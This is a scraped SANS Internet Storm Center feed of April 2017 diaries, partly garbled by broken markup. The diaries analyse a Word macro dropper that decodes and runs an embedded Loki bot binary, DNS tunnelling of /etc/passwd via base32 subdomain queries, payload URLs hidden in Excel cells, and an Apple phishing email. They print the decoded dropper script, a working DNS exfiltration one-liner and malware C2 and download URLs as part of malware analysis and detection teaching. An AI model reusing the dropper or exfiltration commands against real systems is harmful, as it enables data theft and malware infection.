Menu

Internet Storm Center

Traffic

News Feeds (RSS) Internet Storm Center

Mon, 24 Apr 2017 02:05:02 -0600

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Sun, 23 Apr 2017 20:04:40 -0600

This week I saw again a PDF containing a malicious Word document with macros (a downloader).

The PDF contains JavaScript to extract the malicious Word document and launch Word. The user is prompted before this action takes place, but if you want to mitigate this, you can disable JavaScript. If you use Adobe Reader version 15.009.20069 or later, then the extracted Word document is marked with a mark-of-web, regardless if the containing PDF document is marked as such.

I made a video of the analysis of this document.

%%cve:2017-0199%%

There has been a lot of talk about RTF documents exploiting CVE-2017-0199, making Word download and execute an HTML application without requiring any user interaction (except taking the document out of Protected View, depending on the presence of a mark-of-web). And this without VBA macros (RTF does not support VBA macros).

After applying Microsofts patch for CVE-2017-0199, a downloaded HTA is no longer executed, but it is still downloaded without user interaction. The attention that the RTF auto-update technique received (employed for delivering a CVE-2017-0199 exploit), will certainly stimulate the use of this technique for other purposes, like tracking.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Sun, 23 Apr 2017 13:35:40 -0600

I don width:1000px" />

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

Ill be teaching FOR610 in June, Sept, and Oct. See my schedule here:https://www.sans.org/instructors/jim-clausing

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Fri, 21 Apr 2017 07:18:09 -0600

Thanks to our readers, we get often interesting samples to analyze. This time, Frederick sent us a malicious Microsoft Word document called Invoice_6083.doc (which was delivered in a zip archive). I had a quick look padding:5px 10px"> viper Invoice_6083.doc padding:5px 10px"> viper Invoice_6083.doc virustotal -v [+] VirusTotal Report for bc922d7335a58ae4269bfd652d62f03e: [*] Detecting engines: +----------------------+------------------------------+ | Antivirus | Signature | +----------------------+------------------------------+ | Ad-Aware | Trojan.GenericKD.4881915 | | AegisLab | Troj.Ole2.Agent!c | | Arcabit | Trojan.Generic.D4A7DFB | | Avast | VBS:Agent-BRE [Trj] | | BitDefender | Trojan.GenericKD.4881915 | | Cyren | Trojan.OGWQ-7 | | ESET-NOD32 | VBS/Kryptik.FI | | Emsisoft | Trojan.GenericKD.4881915 (B) | | F-Secure | Trojan.GenericKD.4881915 | | Fortinet | VBS/Kryptik.GA!tr | | GData | Trojan.GenericKD.4881915 | | Kaspersky | HEUR:Trojan.OLE2.Agent.gen | | McAfee | W97M/Downloader | | McAfee-GW-Edition | W97M/Downloader | | MicroWorld-eScan | Trojan.GenericKD.4881915 | | NANO-Antivirus | Trojan.Script.NJRat.dzzenc | | Qihoo-360 | virus.vbs.qexvmc.1 | | Symantec | Trojan.Mdropper | | TrendMicro | TROJ_DROPPER.XXTWD | | TrendMicro-HouseCall | TROJ_DROPPER.XXTWD | | ZoneAlarm | HEUR:Trojan.OLE2.Agent.gen | +----------------------+------------------------------+ [*] 21 out of 56 antivirus detected bc922d7335a58ae4269bfd652d62f03e as malicious. [*] https://www.virustotal.com/file/d687ee9fe3b034dcd1e53fb37e2b26bc60e74ff505808b577f2c633d5549e422/analysis/1492633739/

A first behaviour is interesting: The document does not ask the user to enable macro if not enabled width:800px" />

A shell object is attached to the button Preview clearly width:400px" />

The OLE object is listed in the following screenshot as ObjectPool-_1554011838-Ole10Native padding:5px 10px"> viper Invoice_6083.doc padding:5px 10px"> gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(646174613D223839354332343138333343333333343432333334343234343033333434323434343234313438426438633165383032633165333165306264383862333438424538303343304331454431) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(4630424538384234343234313438393643323434303842453843314530303543314544343143303336433234333830334335384235434834643561393030303033303030303030303430303030303066666666303030306238303030303030303030303030303034303030303030303030303030303030303030303030303030) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(3030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030463030303030303030453146424130453030423430394344323142383031344343443231353436383639373332303730373236663637373236313664323036333631366536653666373432303632363532) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(3037323735364532303639364532303434344635333230364436463634363532453044304430413234303030303030303030303030303063636364373866653838616331366164383861633136616438384143313641443831443439354144383941433136414434424133344241443841414331364144384441303139414438) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(3941433136414433443332463341443842414331364144383841433136414438636163313661643831643438336164383961633136616438386163313761646337616331366164383164343835616439396163313661643364333266376164663361633136616433643332633861643839414331364144353236393633363838) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(3841433136414430303030303030303030303030303030353034353030303034433031303430303835303836433537303030303030303030303030303030304530303030333031304230313043303030303338303130303030413230383030303030303030303064653339303130303030313030303030303035303031303030) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(3030303430303030303130303030303030303230303030303530303031303030303030303030303035303030313030303030303030303030303230304130303030303430303030303030303030303030323030303038303030303031303030303031303030303030303030313030303030313030303030303030303030303031) ...(stuff delete)... gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(696E2E686578223A7069632E6E6F6465547970656456616C7565203D207374723A74656D70203D207069632E6E6F6465547970656456616C75653A77697468204372656174654F626A656374282241444F44422E53747265616D22293A2E74797065203D20313A2E6F70656E3A2E77726974652074656D703A2E73617665546F) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(46696C6520664E616D652C20323A2E636C6F73653A656E6420776974683A656E64207375623A736574207773203D204372656174654F626A6563742822575363726970742E5368656C6C22293A666E203D2077732E457870616E64456E7669726F6E6D656E74537472696E677328222574656D70252229202620225C746D702E) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(657865223A7361766546696C6520666E2C646174613A77732E52756E20666E3A777363726970742E736C65657020313030) ExecuteGlobal gdtyaqiopndghdliosndgaqponvc Function dghdggaqiojdndgmnxlosjodpkdd(gdtyaqiopndghdliosndgaqponvc) For y = 1 To Len(gdtyaqiopndghdliosndgaqponvc) Step 2 ml = ml CHRW(Clng(H Mid(gdtyaqiopndghdliosndgaqponvc, y, 2))) Next dghdggaqiojdndgmnxlosjodpkdd = ml End Function

The function dghdggaqiojdndgmnxlosjodpkdd parses the string by apair of characters and convert the hex values. Everything is appended into a long string passed to ExecuteGlobal(). The result padding:5px 10px"> data=895C241833C333442334424403344244424148Bd8c1e802c1e31e0bd88b348BE803C0C1ED1F0BE88B442414896C24408BE8C1E005C1ED41C036C243803C58B5CH4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000F00000000E1FBA0E00B409CD21B8014CCD21546869732070726f6772616d2063616e6e6f742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000cccd78fe88ac16ad88ac16ad88AC16AD81D495AD89AC16AD4BA34BAD8AAC16AD8DA019AD89AC16AD3D32F3AD8BAC16AD88AC16AD8cac16ad81d483ad89ac16ad88ac17adc7ac16ad81d485ad99ac16ad3d32f7adf3ac16ad3d32c8ad89AC16AD5269636888AC16AD0000000000000000504500004C01040085086C570000000000000000E00003010B010C000038010000A2080000000000de39010000100000005001000000400000100000000200000500010000000000050001000000000000200A000004000000000000020000800000100000100000000010000010000000000000100000000000000000000000D08E0100640000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005001005c0000000000000000000000000000000000000000000000000000002E74657874000000F5360100001000000038010000040000000000000000000000000000200000602e72646174610000604000000050010000420000003c0100000000000000000000000000400000402e64617461000000245e080000A0010000020000007E0100000000000000000000000000400000c02e780000000000000020000000000A000020000000800100000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008b44240483f8027d08b864000000c2040083F8047D08B802000000C2040083F8087D08B804000000c2040083f8107d08b806000000c2040083F8207D08B808000000C2040083F8407D08B80A000000C204003D800000007D08B80C000000C204003D000100007D08B80E000000C204003D000200007d08b810000000c204003d000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 data=split(data,H)(1) sub saveFile(fName,str) dim temp set xmldoc = CreateObject(Microsoft.XMLDOM) xmldoc.loadXml ?xml version=1.0? set pic = xmldoc.createElement(pic) pic.dataType = bin.hex pic.nodeTypedValue = str temp = pic.nodeTypedValue with CreateObject(ADODB.Stream) .type = 1 .open .write temp .saveToFile fName, 2 .close end with end sub set ws = CreateObject(WScript.Shell) fn = ws.ExpandEnvironmentStrings(%temp%) \tmp.exe saveFile fn,data ws.Run fn wscript.sleep 100

The key is to split the string data with the character H and use the second element. After the H, you can see the following characters 0x4D 0x5A which indicates the beginning of the malicious payload (MZ padding:5px 10px"> viper Invoice_6083.exe padding:5px 10px"> viper Invoice_6083.exe width:802px" />

It communicates with hxxp://account-verification.s3rv.me/vvv/Panel/five/fre.php(Its a Loki bot. It is known to steal logins from many applications and Bitcoin wallets from the infected computer).

To resume, the malicious document:

  • Does not automatically execute the malicious macro but ask the victim to execute it
  • Contains multiple layers of obfuscation
  • Drops a payload which is not downloaded from the wild Internet but stored (encoded) in the macro.

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Thu, 20 Apr 2017 23:45:03 -0600

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Thu, 20 Apr 2017 07:07:42 -0600

In many cases, DNS remains a goldmine to detect potentially malicious activity. DNS can be used in multiple ways to bypass securitycontrols. DNS tunnelling is a common way to establish connections with remote systems. It is often based on TXT records used to deliver the encoded payload. TXT records are also used for good reasons, like delivering SPF records but, too many TXT DNS request could mean that something weird is happening on your network.

Instead of using TXT records, data exfiltration may occur directly via the FQDN (Fully Qualified Domain Name). The RFC 1035[1] states that a DNS query length is255 characters total with each subdomain being 63 characters or less. By using Base32 encoding[2], we can encode our data instrings compatible with the DNS requirements: A-Z, 0-9 and - padding:5px 10px"> $ cat /etc/passwd | base32 -w 63 | while read L do dig $L.data.rootshell.be @192.168.254.8 done

Note: the parameter -w 63 padding:5px 10px"> $ grep data.rootshell.be queries.log 20-Apr-2017 08:32:11.075 queries: info: client 172.x.x.x#44635: query: OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.113 queries: info: client 172.x.x.X#50081: query: YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.173 queries: info: client 172.x.x.x#40457: query: QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.222 queries: info: client 172.x.x.x#56897: query: 6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.276 queries: info: client 172.x.x.x#57339: query: GOTYHI2DUNRVGUZTIOTTPFXGGORPMJUW4ORPMJUW4L3TPFXGGCTHMFWWK4Z2PA5.data.rootshell.be IN A +E (192.168.254.8) ...

To decode this on the attacker padding:5px 10px"> $ grep data.rootshell.be queries.log | cut -d -f8 | cut -d . -f1| base32 -d | more root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin ...

We don padding:5px 10px"> # tcpdump -vvv -s 0 -i eth0 -l -n port 53 | egrep A\? .*\.data\.rootshell\.be tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 172.x.x.x.40335 192.168.254.8.53: [udp sum ok] 9843+ [1au] A? OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootshell.be. ar: . OPT UDPsize=4096 (110) 172.x.x.x.35770 192.168.254.8.53: [udp sum ok] 19877+ [1au] A? YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootshell.be. ar: . OPT UDPsize=4096 (110) 172.x.x.x.41463 192.168.254.8.53: [udp sum ok] 29267+ [1au] A? QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootshell.be. ar: . OPT UDPsize=4096 (110) 172.x.x.x.38048 192.168.254.8.53: [udp sum ok] 30042+ [1au] A? 6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootshell.be. ar: . OPT UDPsize=4096 (110) ...

As you can see, we just used standard DNS requests to exfiltrate data. To detect this, keep an eye on your DNS logs and particularlythe query length. The following graph width:770px" />

But, as usual, not all big DNS queries are suspicious. Some CDNs padding:5px 10px"> hxxps://2ecffd01e1ab3e9383f0-07db7b9624bbdf022e3b5395236d5cf8.ssl.cf4.rackcdn.com/Product/178ee827-0671-4f17-b75b-2022963f5980.pdf

To reduce the risk of false positives, this control can be combined with others:

  • The volume of traffic per IP
  • The volume of traffic per (sub-)domain
  • White-lists

This technique is not new but comes back regularly in front of the stage. The malware Wekby[3] discovered in 2016 was already using this technique for C2 communications.

[1]https://www.ietf.org/rfc/rfc1035.txt
[2]https://en.wikipedia.org/wiki/Base32
[3]http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Thu, 20 Apr 2017 00:40:02 -0600

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Wed, 19 Apr 2017 05:47:56 -0600

Recently, I found a malicious Excel sheet which contained a VBA macro. One particularity of this file was that useful information was stored in cells. The VBA macro read and used them to download the malicious PE file. The Excel file looked classic, asking the user to enable macros:

But below, around the 1000th row, some cells were hidden:

Once expanded, they revealed interesting values:

The macro code used the contain of those cells:

yryrysdhahshdfkjfkslksdlkfllskjdflkjsdflslksdjkf = kjjhkhdskhsdhsdjvjsdffdjgjgsjdfsjdf(0, Sheets(1).Cells(1000, 2), C:\Temp\  Sheets(1).Cells(1001, 2)), 0, 0)
kjhadkjhfkasjhdkfjhakjhfkasjhdf = Sheets(1).Cells(1004, 2)sdlkjfgksjdfkjhdkjfgkjsfdhjghjdfgwscript = Sheets(1).Cells(1003, 2)
kjfdkkjgnknngndg = Sheets(1).Cells(1002, 2)

The rest of the macro was, as usual, to download the malicious PE file, to store it on the disk and to execute it. The PE file has a VT score of 10/60 [1]

This is not the first time that I saw this way of passing data to the macro. Its easy to configure campaigns with many URLs and samples without touching the macro. I had a bunch of 400 malicious Excel sheets to inspect. To search for such hidden content, I wrote a quick Python script[2] based on the XLRD[3] module. Yes, Python has third-party modules for almost any task! The goal is to detect two techniques to hide data:

  • Hidden cells
  • Cells using the same colour for the text padding:5px 10px"> $ ./hidden.py 1.xls|more Number of sheets: 3 --- Processing sheet 0 (????1) --- [ 5/ 8] Document created in earlier version of Microsoft Office Excel [ 7/ 8] To view this content, please click Enable Editing form the yellow bar and then click Enable Content [ 999/ 0] [H] Url [ 999/ 1] [H] http://astrasunxc.top/read.php?f=chrome_update.exe [ 1000/ 0] [H] Name_file [ 1000/ 1] [H] myfile.exe [ 1001/ 1] [H] cript [ 1002/ 1] [H] .Shell [ 1003/ 1] [H] ws --- Processing sheet 1 (????2) --- [ 0/ 0] Company Name [ 0/ 4] INVOICE [ 1/ 0] [Street Address] [ 2/ 0] [City, ST ZIP] [ 3/ 0] Phone: [000-000-0000] [ 4/ 0] Fax: [000-000-0000] [ 8/ 0] BILL TO [ 9/ 0] [Name] [ 10/ 0] [Company Name] [ 11/ 0] [Street Address] [ 12/ 0] [City, ST ZIP] [ 13/ 0] [Phone] [ 15/ 0] DESCRIPTION [ 15/ 4] TAXED [ 15/ 5] AMOUNT [ 16/ 0] [Service Fee] [ 16/ 5] 230.0 [ 17/ 0] [Labor: 5 hours at $75/hr] [ 17/ 5] 375.0 [ 18/ 0] [Parts] [ 18/ 4] X [ 18/ 5] 345.0 [ 23/ 3] [42] [ 23/ 4] Subtotal [ 23/ 5] 950.0 [ 24/ 4] Taxable [ 24/ 5] 345.0 [ 25/ 0] OTHER COMMENTS [ 25/ 4] Tax rate [ 25/ 5] 0.0625 [ 26/ 0] 1. Total payment due in 30 days [ 26/ 4] Tax due [ 26/ 5] 21.56 [ 27/ 0] 2. Please include the invoice number on your check [ 27/ 4] Other [ 28/ 4] TOTAL [ 28/ 5] 971.56 [ 30/ 4] Make all checks payable to [ 31/ 4] [Your Company Name] --- Processing sheet 2 (????3) ---

    A lighter output (use the -q/ padding:5px 10px"> $ ./hidden.py -q 1.xls Number of sheets: 3 --- Processing sheet 0 (????1) --- [ 999/ 0] [H] Url [ 999/ 1] [H] http://astrasunxc.top/read.php?f=chrome_update.exe [ 1000/ 0] [H] Name_file [ 1000/ 1] [H] myfile.exe [ 1001/ 1] [H] cript [ 1002/ 1] [H] .Shell [ 1003/ 1] [H] ws padding:5px 10px"> 77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184,0,0,0,0,0,0,0,64,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,240,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114,97,109,32,99,97,110,110,111,116,32, 98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36,0,0,0,0,0,0,0,240,105,109,3,180,8,3,80,180,8,3,80, 180,8,3,80,147,206,120,80,183,8,3,80,180,8,2,80,189,8,3,80,147,206,126,80,176,8,3,80,147,206,110,80,190,8,3,80,147,206,121,80,181, 8,3,80,147,206,127,80,181,8,3,80,147,206,123,80,181,8,3,80,82,105,99,104,180,8,3,80,82,105,99,104,51,0,145,193,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,80,69,0,0,76,1,4,0,21,150,213,85,0,0,0,0,0,0,0,0,224,0,3,1,11,1,0,1,0,64,1,0,0,192,0,0,0,0,0,0,80,169, 0,0,0,16,0,0,0,80,1,0,0,0,64,0,0,16,0,0,0,16,0,0,4,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,176,2,0,0,16,0,0,0,0,0,0,2,0,0,128,0,0,16,0,0, 16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16,0,0,0,176,208,1,0,70,0,0,0,244,194,1,0,44,1,0,0,0,16,2,0,52,152,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,136,194,1,0,64,0,0,0,0,0,0,0,0,0,0,0,0,80,1, 0,168,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,46,116,101,120,116,0,0,0,110,63,1,0,0,16,0,0,0,64,1,0,0,16,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,33,0,0,96,46,114,100,97,116,97,0,0,246,128,0,0,0,80,1,0,0,144,0,0,0,80,1,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,64,46,100, 97,116,97,0,0,0,196,34,0,0,0,224,1,0,0,16,0,0,0,224,1,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,192,46,114,115,114,99, ...

    As you can see, it starts with 77 and 90 which are the ASCII representation of the letters MZ padding:5px 10px"> f = open(sample.exe, wb) buffer = 77,90,144, . for c in buffer.split(, padding:5px 10px"> viper find name 1.xls +---+-------+--------------------------+----------------------------------+------------------------+ | # | Name | Mime | MD5 | Tags | +---+-------+--------------------------+----------------------------------+------------------------+ | 1 | 1.xls | application/vnd.ms-excel | e6190b79db7b32e9a34bc4ee473209c8 | spam, embedded_win_api | +---+-------+--------------------------+----------------------------------+------------------------+ viper open -l 1 [*] Session opened on /home/nonroot/.viper/binaries/5/2/c/f/52cf6415c7763bede4af3cfc6543a4557d6ff5cb9fd02b5ed239352f005a8c39 viper 1.xls excel [*] Sheet 0 +------+-----+--------+---------------------------------------------------------------------------------------------------------+ | Row | Col | Status | Value | +------+-----+--------+---------------------------------------------------------------------------------------------------------+ | 5 | 8 | | Document created in earlier version of Microsoft Office Excel | | 7 | 8 | | To view this content, please click Enable Editing form the yellow bar and then click Enable Content | | 999 | 0 | Hidden | Url | | 999 | 1 | Hidden | http://astrasunxc.top/read.php?f=chrome_update.exe | | 1000 | 0 | Hidden | Name_file | | 1000 | 1 | Hidden | myfile.exe | | 1001 | 1 | Hidden | cript | | 1002 | 1 | Hidden | .Shell | | 1003 | 1 | Hidden | ws | +------+-----+--------+---------------------------------------------------------------------------------------------------------+ [*] Sheet 1 +-----+-----+--------+----------------------------------------------------+ | Row | Col | Status | Value | +-----+-----+--------+----------------------------------------------------+ ...

    As you can see, bad guys also use data stored in the document itself and access it from the VBA code. I also saw a few times white text on white background in Word documents. Happy hunting!

    [1]https://www.virustotal.com/file/3626729fe8a77f74f4f6da58d5fb474d9c774dff3494063c5f8b4fc50f908585/analysis/1491843226/
    [2]https://github.com/xme/toolbox/blob/master/xls_hidden.py
    [3]https://github.com/python-excel/xlrd
    [4]https://github.com/xme/toolbox/blob/master/excel.py

    Xavier Mertens (@xme)
    ISC Handler - Freelance Security Consultant
    PGP Key

    (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

    Wed, 19 Apr 2017 01:10:02 -0600

    (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

    Tue, 18 Apr 2017 16:14:32 -0600

    Our reader Charlieforwarded us a somewhat interesting Apple phish. Apple is a big phishing target, and the phish itself wasnt all that special. It does a reasonable good jobemulating real Apple e-mails, but what is more interesting are the From width:300px" />

    The From address was set to apple.ssl.com . For the uninitiated, this may look like a valid Apple domain. But instead, it is a subdomain of ssl.com. SSL.com is of course not the valid source of the e-mail. But why did this e-mail make it past SPF filters? ssl.com does define an SPF record:

    v=spf1 ip4:144.76.245.218 ip4:199.102.137.146 include:amazonses.com include:mailanyone.net include:fusemail.net ~all

    The record contains a common error: In the end, the ~ ahead of all indicates a soft fail. In essence, this may short-out the SPF definition. There is also no DMARC record for this domain. The ~ is often added to prevent false positives, for example, if companies are afraid that they didnt capture all the mail servers sending e-mail on their behalf. While this may be a good idea initially, it should be removed later.

    Next, the link leads to apple1-id.com. The domain is not associated with Apple. The web page is still up (but blacklisted), and provides a good copy of the genuine Apple login page. width:300px" />

    Interesting about this domain: It was registered back in January. So the bad guy put some work into this to avoid some recently registered domain filters.

    So lessons learned:

    • Make sure yourSPF record ends with -all not ~all (subtle but important)
    • When hunting for bad domains, details matter and the registration date may not be enough to find malicious domains.

    ---
    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
    STI|Twitter|

    (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.